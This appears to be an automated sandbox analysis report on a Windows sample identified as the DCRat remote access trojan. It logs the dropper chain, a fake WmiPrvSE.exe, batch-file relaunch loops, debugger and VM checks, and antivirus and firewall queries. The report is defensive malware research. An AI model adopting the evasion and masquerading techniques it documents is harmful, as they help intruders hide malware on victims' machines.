Source: WmiPrvSE.exe, 0000002F.00000002.2556933047.000000001B8E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: WmiPrvSE.exe, 0000002F.00000002.2511950701.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}M
Source: WmiPrvSE.exe, 0000002F.00000002.2511950701.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: WmiPrvSE.exe, 00000009.00000002.1792979636.0000000001163000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYYuvP
Source: w32tm.exe, 00000029.00000002.2418340094.0000024BCA0D9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: work.exe, 00000003.00000003.1670700211.0000000002D34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yQW
Source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001AFB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: w32tm.exe, 00000034.00000002.2579878792.000001DF2A777000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
Source: WmiPrvSE.exe, 00000016.00000002.2036691639.000000001B4A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v
Source: WmiPrvSE.exe, 00000025.00000002.2387430048.000000001B9F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: pfwa.exe, 00000004.00000002.1664228759.0000000001262000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1905081350.0000000001307000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2020609690.0000000000868000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2132092550.0000000000BA4000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2437216243.0000000001859000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2599886559.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2732059685.0000000000F3B000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000003E.00000002.2782908697.000001B867117000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2801269858.00000000016C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WmiPrvSE.exe, 00000020.00000002.2244382852.000000000159C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll44
Source: WmiPrvSE.exe, 00000025.00000002.2367084199.000000000110C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpp
Source: WmiPrvSE.exe, 0000003A.00000002.2768917158.000000001BAF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BA0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00BA0A0A

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA91B0 mov eax, dword ptr fs:[00000030h]		0_2_00BA91B0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A091B0 mov eax, dword ptr fs:[00000030h]		3_2_00A091B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BAD1F0 GetProcessHeap,

0_2_00BAD1F0

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BA0A0A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0B9D SetUnhandledExceptionFilter,	0_2_00BA0B9D
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA0D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BA0D8A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA4FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BA4FEF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00A0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A00A0A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00B9D SetUnhandledExceptionFilter,	3_2_00A00B9D
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A00D8A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00A00D8A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_00A04FEF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00A04FEF

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\twain_32\WmiPrvSE.exe "C:\Windows\twain_32\WmiPrvSE.exe"
Source: C:\Windows\twain_32\WmiPrvSE.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B9BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree,

0_2_00B9BEFF

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00BA0826 cpuid

0_2_00BA0826

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		0_2_00B9C093
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		3_2_009FC093

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\twain_32\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\twain_32\WmiPrvSE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

0_2_00B9F05C

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B8C365 GetVersionExW,

0_2_00B8C365

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\twain_32\WmiPrvSE.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 4.0.pfwa.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1637515390.0000000000B92000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1635034853.0000000004CE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: work.exe PID: 7628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: pfwa.exe PID: 7668, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\twain_32\WmiPrvSE.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe, type: DROPPED
